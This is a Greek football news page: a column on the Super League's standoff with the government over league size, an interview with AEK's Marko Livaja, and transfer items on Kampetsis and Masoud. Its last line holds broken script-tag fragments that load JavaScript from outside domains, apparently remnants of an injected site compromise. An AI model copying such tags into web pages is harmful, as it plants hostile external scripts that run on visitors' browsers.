Το πρωτάθλημα (έτσι) δεν ξεκινάει * Λιβάγια: “Ηγέτης ναι, αλλά η δουλειά είναι ομαδική” * Ακόμα πιο κοντά στον Καμπετσή ο Παναθηναϊκός * «Μάλλον Νασαγί, ‘φλερτ’ με Απόλλωνα»

Η Πολιτεία επιμένει για τις 12 ομάδες από τη σεζόν 2020-2021, η Super League δεν… πέφτει κάτω από τις 14 και έτσι το πρωτάθλημα βρίσκεται στον αέρα λίγες ώρες πριν από τη κρίσιμη συνεδρίαση του Δ.Σ της Λίγκας. Προσπαθούμε να καταλάβουμε εδώ και καιρό τι ακριβώς θέλουν οι ομάδες, ειδικά οι τηλεοπτικά άστεγες, για να ικανοποιηθούν.

Και αδυνατούμε να το βρούμε. Λειτουργούν, λες και κάποιος τους χρωστάει κάτι και οφείλει να τους το δώσει. Ειδικά οι επαφές τους με τον Βασιλειάδη, έχουν πολύ πλάκα. Του μιλάνε, λες και ο Υφυπουργός είναι τηλεοπτικός ατζέντης και ζει από αυτό. Φοβερά πράγματα.

Καλά εδώ βέβαια φταίει και ο ίδιος ο Βασιλειάδης που το επέτρεψε, αλλά εσχάτως το πάει καλά. Τα έφερε από εδώ, τα έφερε από εκεί, τους πήρε με το καλό, τους πήρε με το λιγότερο καλό, άκρη δεν έβγαλε. Σιγά μην έβγαλε. Ποιος βγάζει άλλωστε άκρη με τους περισσότερους παράγοντες των ελληνικών ΠΑΕ; Αν έβγαζε κάποιος δεν θα φτάναμε σε αυτό το σημείο, να έχουμε ένα απαξιωμένο πρωτάθλημα.

ΑΠΟΡΡΙΠΤΟΥΝ ΤΟ ΠΛΑΝΟ ΤΩΝ 12 ΟΜΑΔΩΝ

Και όμως με τόσο ξεπεσμένο προϊόν, οι ομάδες φέρονται λες και έχουν την Premier League και θα έρθουν τα κανάλια να τους τάξουν τα δισεκατομμύρια για να πάρουν τους αγώνες τους. Για να είμαι ειλικρινής, δεν μπορώ να πιστέψω ότι τόσο φτασμένοι επιχειρηματίες δεν βλέπουν ποιο είναι το συμφέρον τους, αλλά εγώ είμαι ένας απλός δημοσιογράφος. Δεν έχω τη γνώση τη δική τους, οπότε θα περιμένω να δω τι θα γίνει.

Αυτό που αποκλείεται να γίνει με τα σημερινά δεδομένα, είναι να δούμε έναρξη του νέου πρωταθλήματος. Και αυτό διότι οι ομάδες σήμερα θα απορρίψουν ξανά το “πλάνο Βασιλειάδη” και θα επιμείνουν στην αρχική τους θέση για μίνιμουμ 14 ομάδες στη μεγάλη κατηγορία, όπως και αν θα λέγεται αυτή.

Σύμφωνα με όλες τις πληροφορίες, δεν αποδέχονται το “12” ούτε για τη σεζόν 2020-2021, όπως αρχικά είχε φανεί πως θα συμβεί, με βάση όσα διέρρεαν από το προεδρείο της Super League.

Το πιο αισιόδοξο σενάριο και ίσως το πιο εφικτό έκανε λόγο για 16 ομάδες εφέτος, 14 του χρόνου (2019-2020) και 12 του παραχρόνου (2020-2021). Αμ δε.

Μαθαίνουμε πως η τελική “ετυμηγορία” μικρών και μεγάλων ΠΑΕ του Συνεταιρισμού, είναι πως “κάτω από τις 14 ομάδες, δεν πέφτουμε σε καμία περίπτωση”. Και την ίδια ώρα ζητούν νέα συνάντηση με τον Υφυπουργό για να τον πείσουν πως αυτό είναι το ιδανικό σχέδιο για όλους.

Η Πολιτεία με πρώτον τον Τσίπρα και άμεσο εκφραστή τον Βασιλειάδη λέει πως “το μοντέλο λειτουργίας του επαγγελματικού ποδοσφαίρου αντέχει μέχρι 12 ομάδες στη μεγάλη κατηγορία και μόνο έτσι συζητάμε να προχωρήσει το πλάνο μας”.

Μύλος. Και προφανώς το χάσμα δεν γεφυρώνεται. Ξέρω πως στο μάτι σας φαίνεται “μόνο δύο ομάδες είναι μωρέ, ας κάνουν λίγο πίσω όλοι τους”. Αλλά δεν είναι έτσι.

ΒΑΖΟΥΝ ΤΗΝ “ΤΡΕΛΑ” ΤΟΥΣ ΠΑΝΩ ΑΠΟ ΤΑ ΧΡΗΜΑΤΑ

Πρέπει να κατανοήσουμε κάτι. Το 80% των παραγόντων/επιχειρηματιών που έχουν τις ΠΑΕ δεν το κάνουν για βιοπορισμό. Μέσα μπαίνουν και κάποιοι μάλιστα με τα μπούνια. Το κάνουν γιατί το ποδόσφαιρο είναι η τρέλα τους. Ξεκάθαρα παράδειγμα ο Πανόπουλος και ο Σπανός. Νοικοκυρεμένα μαγαζιά, αλλά το χέρι στην τσέπη μπαίνει, και κάποιες χρονιές έμπαινε αρκετά βαθιά. Την τρέλα τους κάνουν και σε αυτό το πλαίσιο θέλουν να παίζουν με τους μεγάλους. Αυτό τους καίει περισσότερο και από τα όποια χρήματα τους τάζει η Πολιτεία μέσω της ΕΡΤ.

Σου λέει ο Κομπότης, ο Σπανός, ο Μονεμβασιώτης κτλ… “Αν μία χρονιά δεν τα πάω καλά και πέσω στη Super League 2, ναι, θα πάρω 1,5-2 εκατομμύρια ευρώ, αλλά θα παίζω με τους μικρούς. Ποιο το κίνητρο μου;”. Δεν είναι παράλογο, αλλά εδώ που φτάσαμε πρέπει να πάρουν γενναίες αποφάσεις. Κάτι θα χάσουν, κάτι θα κερδίσουν.

Κάποιοι θέλουν και την πίτα ολόκληρη και τον σκύλο χορτάτο. Σόρυ, αλλά δεν βλέπω το πως. Εκτός αν υπάρχει άλλος τηλεοπτικός παίκτης στο παρασκήνιο και μιλούν εκ του ασφαλούς. Ποιος όμως και γιατί τόσον καιρό δεν εμφανίζεται;

ΥΠΑΡΧΟΥΝ ΕΥΘΥΝΕΣ ΓΙΑ ΤΗ ΣΗΜΕΡΙΝΗ ΚΑΤΑΣΤΑΣΗ

Έτσι όπως τα βλέπουμε τα πράγματα και όπως φτάνουν στα αυτιά μας κάποιες απόψεις, πρέπει να υπάρξει ολική ανατροπή δεδομένων για να έχουμε σέντρα τον Αύγουστο στο πρωτάθλημα. Χωρίς τηλεοπτική στέγη μπορεί να ξεκινήσει (βάσει νόμου) ένα πρωτάθλημα. Χωρίς πλαίσιο και βούληση των ομάδων με τίποτα.

Οι ομάδες και συγκεκριμένα πρόσωπα της Super League, φέρουν την απόλυτη ευθύνη για το “σπάσιμο” της Κεντρικής Διαχείρισης. Συνέβη. Πάμε παρακάτω. Θα συνεχίσουν να λειτουργούν ανεύθυνα και θα ρίξουν στον γκρεμό το επαγγελματικό ποδόσφαιρο; Θα βρουν λύσεις έστω και στο 90; Γιατί και μόνο που επικαλούνται το αυτοδιοίκητο, αλλά ζητούν από την Πολιτεία να τους βρει (τηλεοπτική) λύση, καθιστά αμφίβολη την οικονομική επιβίωση τους.

Στο χωριό μου, αυτός που σου δίνει τα χρήματα, ορίζει και τους κανόνες. Δεν τους ορίζεις εσύ. Αν δεν θες, πολύ απλά, δεν πας σε ραντεβού μαζί του και κοιτάς μόνος σου να βρεις τις λύσεις. Αυτό σημαίνει (μεταξύ άλλων) αυτοδιοίκητο.

 

Λιβάγια: “Ηγέτης ναι, αλλά η δουλειά είναι ομαδική”

Ο πρωταθλητής και με το πιο ακριβό συμβόλαιο, Μάρκο Λιβάγια, μιλάει για τη νέα σεζόν και τη νέα ΑΕΚ που χτίζεται από τον Μαρίνο Ουζουνίδη με στόχο το back to back. Αναλυτικά η συνέντευξή του.

Πέρυσι για την ΑΕΚ, ο Μάρκος Λιβάγια ήταν το μεγάλο στοίχημα. Τον φέρει ως δανεικό από την Λας Πάλμας προσδοκώντας να βγει περίπτωση Αραούχο. Φέτος όμως, ο Λιβάγια είναι για την ΑΕΚ η μεγάλη επένδυση. Ξόδεψε κοντά στα δυο εκατομμύρια για τον αγοράσει από την Λας Πάλμας και του έδωσε τριετές συμβόλαιο.

Επενδύοντας κυρίως στις ηγετικές ικανότητες του δεύτερου σκόρερ της και πρώτου σε ασιστ στο περυσινό πρωτάθλημα. Και ο Λιβάγια δεν διστάζει να αποδεχθεί τον ρόλο του ηγέτη, αφού διευκρινίζει πως η δουλειά είναι μόνο ομαδική. Ενώ μιλά για τους στόχους που βάζει η πρωταθλήτρια ΑΕΚ, για τη νέα σεζόν.

Αναλυτικά η συνέντευξη:

– Πέρυσι τέτοια εποχή καθόσουν εδώ απέναντί μας, είχες έρθει με τη μορφή δανεισμού και προσπαθούσες να βρεις τα πατήματά σου. Έναν χρόνο μετά είσαι «δεμένος» με τρία χρόνια συμβόλαιο και πρωταθλητής. Πως αισθάνεσαι;

“Αισθάνομαι πάρα πολύ περήφανος για αυτή την ομάδα. Μπορέσαμε και κατακτήσαμε το πρωτάθλημα μετά από 24 χρόνια! Κάναμε μία καταπληκτική δουλειά, όμως αυτό πλέον αποτελεί παρελθόν! Πλέον πρέπει να είμαστε απόλυτα συγκεντρωμένοι στη δουλειά μας γιατί έχουμε πολύ σημαντικά παιχνίδια μπροστά μας, με πρώτο αυτό για τα προκριματικά του Champions League”.

– Η ΑΕΚ πλήρωσε ένα πολύ σημαντικό ποσό για να σε αποκτήσει. Πολλοί σε βλέπουν ως το νέο ηγέτη της ομάδας. Αισθάνεσαι έτσι, ότι έχεις ένα ηγετικό ρόλο, στη προσπάθεια που θα κάνει η ΑΕΚ να διατηρήσει τα σκήπτρα της;

“Σίγουρα και θα το προσπαθήσω, αλλά δεν είμαι μόνος μου. Υπάρχουν ποδοσφαιριστές με μεγάλη προσωπικότητα, που μπορούν να βοηθήσουν, να σπρώξουν και να ωθήσουν την ομάδα, όπως ο Μάνταλος, ο Τσόσιτς και ο Τσιγκρίνσκι. Όλοι μαζί θα κάνουμε το καλύτερο”.

– Ποιο ήταν το κομβικό στοιχείο που σ’ έκανε να νιώσεις απόλυτα ικανοποιημένος στην ΑΕΚ και να πεις το «ναι» στην πρότασή της;

“Συγκρίνοντας τις συμμετοχές στα προηγούμενα πρωταθλήματα που είχα παίξει σε Ιταλία και Ισπανία, φέτος έπαιξα σε πάρα πολλά παιχνίδια. Εμένα με ευχαριστεί αυτό. Το να παίρνω χρόνο συμμετοχής. Αν είμαι στον πάγκο δεν είμαι πάρα πολύ ήρεμος…”.

– Τώρα που έφυγε ο Βράνιες, με ποιον θα κάνεις πλάκες και θα βάζεις στοιχήματα;

“Έχω με όλα τα παιδιά πάρα πολύ καλή σχέση. Περισσότερο με τον Ούρος (σ. σ. Τσόσιτς) και με τον Πέτρο (σ. σ. Μάνταλο), έχουμε καλύτερη σχέση”.

– Μιας και μιλήσαμε για παίκτες που έφυγαν, έχει φύγει και ο Αραούχο με τον οποίο ήσουν δίδυμο πέρυσι στην επίθεση. Σ’ ανησυχεί η «χημεία» που θα έχεις με τον επόμενο σέντερ φορ και πώς αισθάνεσαι που ο Ουζουνίδης σε δοκίμασε ως σέντερ φορ;

“Αυτή τη στιγμή έχουμε και τον Κλωναρίδη και τον Γιακουμάκη με τους οποίους μπορώ να συνεννοούμαι και να συνεργάζομαι. Εγώ μπορώ να παίξω και στις δύο θέσεις. Και σαν δεκάρι και σαν επιθετικός. Προσωπικά προτιμώ να παίζω σαν δεκάρι. Μου αρέσει να δίνω την τελική πάσα. Αλλά όπου μου ζητήσει ο προπονητής θα παίξω και θα κάνω το καλύτερο”.

– Θα σου λείψει αγωνιστικά η παρουσία του Σέρχιο;

“Εγώ πίστευα ότι ο Σέρχιο θα προσπαθούσε και θα κατάφερνε να έρθει, αλλά γνωρίζω τον πρόεδρο της Λας Πάλμας. Είναι ένας δύσκολος άνθρωπος. Οπότε δεν τα κατάφερε να είναι εδώ”.

– Γνωρίζεις το σύνθημα που ακούγεται από τους οπαδούς της ΑΕΚ; Το «κάνει μάγια…»;

“Στην αρχή δεν ήξερα τι έλεγε το σύνθημα, με τον καιρό έμαθα. Είμαι χαρούμενος και περήφανος που έχω αυτή τη σχέση με τον κόσμο. Χαίρομαι που με αγαπάει…”.

– Ως επιθετικός, τι θεωρείς ότι πρέπει να βελτιώσει η ΑΕΚ στην επίθεσή της σε σχέση με πέρυσι;

“Υπάρχουν περιθώρια βελτίωσης. Δουλεύουμε ήδη με το νέο προπονητή που προσπαθεί να μας περάσει τις νέες ιδέες του. Το σίγουρο είναι ότι σε δύο εβδομάδες, δεν έρχεται το άμεσο αποτέλεσμα. Θα χρειαστούμε ένα μήνα, μπορεί και δύο”.

– Ο Μάρκο, ο Σέρχιο και ο Λάζαρος ήταν οι πρώτοι σκόρερ της περσινής ΑΕΚ. Σ’ ανησυχεί που οι δύο εκ των τριών δε θα είναι στην ΑΕΚ φέτος;

“Δε με απασχολεί αυτό και δε με ανησυχεί. Έχει επιστρέψει ο Πέτρος και είναι και ο Τάσος (σ. σ. Μπακασέτας), που μπορεί να παίξει στη θέση του Λάζαρου. Το πιο σημαντικό για μένα είναι να είμαστε ενωμένοι και μετά τα αποτελέσματα θα έρθουν”.

– Η πρώτη πρόκληση της ΑΕΚ είναι τα προκριματικά του Champions League. Μπορεί η ΑΕΚ να παίξει στους ομίλους; Πόσο θα τη βοηθήσει η περσινή της εμπειρία;

“Πέρυσι ξεκινήσαμε και πάλι με προκριματικά για το Champions League κόντρα στην ΤΣΣΚΑ. Ήταν ένα δύσκολο παιχνίδι. Μόνο και μόνο από αυτούς τους δύο αγώνες αποκτήσαμε εμπειρία, αλλά και από τη συνέχεια. Όμως κάθε χρονιά είναι διαφορετική. Αυτό που σκεφτόμαστε, είναι ότι το πρώτο είναι και το πιο σημαντικό παιχνίδι και θα προσπαθήσουμε να είμαστε έτοιμοι”.

– Έχοντας ένα χρόνο στην Ελλάδα και έχοντας παίξει στο εξωτερικό, βλέπεις την ΑΕΚ να εξελίσσεται;

“Το μόνο που είναι σίγουρο, είναι ότι η ΑΕΚ χτίζει το γήπεδό της και με την ολοκλήρωσή του θα ανέβει ένα ακόμα επίπεδο. Τα πράγματα θα πάνε από το καλό στο καλύτερο”.

–  Η ΑΕΚ πήρε το πρωτάθλημα και εσύ ήσουν δεύτερος σκόρερ και πρώτος σε ασίστ. Που βάζεις τον πήχη για τον εαυτό σου τη νέα σεζόν;

“Πάντα στην πρώτη χρονιά και κυρίως τους πρώτους μήνες είναι δύσκολο να προσαρμοστεί ένας ποδοσφαιριστής. Αλλά αυτό που μπορώ να πω είναι ότι θα προσπαθήσω να είμαι ακόμα καλύτερος φέτος”.

– Έζησες έντονα τον προημιτελικό της Κροατίας. Τι βλέπεις για τον ημιτελικό με την Αγγλία;

“Σίγουρα θα το δω. Είναι πολύ σημαντική μέρα για εμάς στην Κροατία. Μετά από 20 χρόνια  που συμμετείχε στα ημιτελικά στη Γαλλία θα είναι η πρώτη φορά που θα πάει στον τελικό σε μία μεγάλη διοργάνωση!”.

– Ζηλεύεις καθόλου τους ποδοσφαιριστές της Κροατίας που βρίσκονται στη Ρωσία;

“Όχι!”

– -Η υπόσχεση του προπονητή πάντως ήταν ότι θα σε καλέσει στα επόμενα παιχνίδια. Ισχύει;

“Αυτό είναι αλήθεια. Μου είχαν πει ότι δεν ήταν δυνατό να υπάρξουν αλλαγές γιατί υπήρχαν ποδοσφαιριστές που συμμετείχαν στα προκριματικά για αυτό το Μουντιάλ. Ποτέ δεν ξέρεις τι θα γίνει στη ζωή. Θα δούμε…”.

 

Ακόμα πιο κοντά στον Καμπετσή ο Παναθηναϊκός

Πραγματοποιήθηκε το ραντεβού ανάμεσα στο Νίκο Νταμπίζα και τον εκπρόσωπο του Αργύρη Καμπετσή με τις δυο πλευρές να συζητούν για τις τελευταίες λεπτομέρειες για τη συνεργασία των δυο πλευρών. Ακόμα πιο κοντά ήρθαν ο Παναθηναϊκός με τον Αργύρη Καμπετσή μετά το ραντεβού που υπήρξε στην διάρκεια της Τρίτης ανάμεσα στο Νίκο Νταμπίζα και τον εκπρόσωπο του 19χρονου ποδοσφαιριστή.

Οι δυο πλευρές συζήτησαν για αρκετή ώρα για όλες τις τελευταίες λεπτομέρειες και τα επόμενα βήματα που πρέπει να γίνουν ώστε να ολοκληρωθεί το deal τα επόμενα 24ωρα και ο διεθνής ποδοσφαιριστής να ενταχθεί άμεσα στον Παναθηναϊκό.

Οι εξελίξεις πλέον αναμένεται να τρέξουν μετά την Πέμπτη καθώς στις 12 Ιουλίου είναι προγραμματισμένη και η επιστροφή της ομάδας Νέων της Ντόρτμουντ στη Γερμανία καθώς τώρα βρίσκεται στο εξωτερικό και πραγματοποιεί το βασικό στάδιο προετοιμασίας της.

Στόχος των πράσινων όπως έχουμε αναφέρει είναι η περίπτωση του Καμπετσή να έχει ολοκληρωθεί μέχρι την Κυριακή και ο 19χρονος επιθετικός να ταξιδέψει στην Ολλανδία.

Πλην του Καμπετσή όπως έχουμε αναφέρει και τις προηγούμενες μέρες στο χέρι του “τριφυλλιού” είναι τόσο ο Μαρκ Σιφναίος όσο και ο Στέφανος Ρεγκάκος. Οι Δώνης-Νταμπίζας θα αποφασίσουν άμεσα αν θα προχωρήσουν τη μία ή και τις δυο περιπτώσεις για την ενίσχυση της επιθετικής γραμμής του Παναθηναϊκού στην οποία τώρα υπάρχουν μόνο οι Πίσπας, Σέχου.

 

«Μάλλον Νασαγί, ‘φλερτ’ με Απόλλωνα»

 «Μάλλον Νασαγί, 'φλερτ' με Απόλλωνα»

Στο Ιράν αναφέρονται στο μέλλον του Μασούντ και «μπλέκουν» την «Ελαφρά Ταξιαρχία»

Στο Ιράν είναι πιθανό να επιστρέψει ο Μασούντ, καθώς όπως μετέδωσαν σήμερα ορισμένα ΜΜΕ της χώρας του, έχει επαφές με την Νασαγί. Πάντως σχολιάζουν σχετικά πως ο πρώην χαφ του Πανιωνίου και της ΑΕΚ «φλερτάρει» και με τον Απόλλωνα Σμύρνης, αφήνοντας ένα παραθυράκι ανοικτό, ώστε ο έμπειρος μέσος να μείνει στην πατρίδα μας.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >